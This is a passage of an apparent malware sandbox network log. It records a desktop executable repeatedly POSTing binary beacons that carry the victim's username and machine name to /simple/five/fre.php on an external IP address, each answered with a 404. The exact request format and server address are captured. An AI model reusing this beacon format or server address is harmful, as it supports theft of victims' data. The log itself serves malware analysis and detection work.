Jan 11, 2025 07:44:50.072154045 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49796	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:50.217021942 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:50.222646952 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:51.077214956 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49804	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:51.227475882 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:51.232326984 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:51.942316055 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49811	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:52.088769913 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:52.093576908 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:52.834891081 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49816	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:52.989439964 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:52.995436907 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:53.762131929 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49821	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:53.925487995 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:53.931454897 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:54.672976017 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49826	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:54.830401897 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:54.835227966 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:55.536554098 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49834	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:55.692316055 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:55.697158098 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:56.428704023 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49840	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:56.571615934 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:56.576534033 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:57.288171053 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49849	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:57.437818050 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:57.442816019 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:58.144304991 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49855	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:58.290638924 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:58.295543909 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:59.021934986 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49862	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:59.477453947 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:59.483479023 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:00.217360973 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49869	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:00.364835024 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:00.369812012 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:01.091602087 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49878	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:01.241889954 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:01.246793985 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:01.958424091 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49884	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:02.309582949 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:02.314357042 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:03.172070980 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49891	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:03.326641083 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:03.331453085 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:04.028904915 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49899	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:04.204330921 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:04.209206104 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:04.919336081 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:04 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49905	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:05.077342987 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:05.082273006 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:05.802587986 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49911	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:05.952497005 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:05.957442045 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:06.809587002 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49919	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:07.168843985 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:07.173717976 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:07.882177114 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49928	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:08.031672001 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:08.037684917 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:08.742408037 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:08 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49934	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:08.909015894 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:08.914118052 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:09.642596006 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49939	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:09.928282976 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
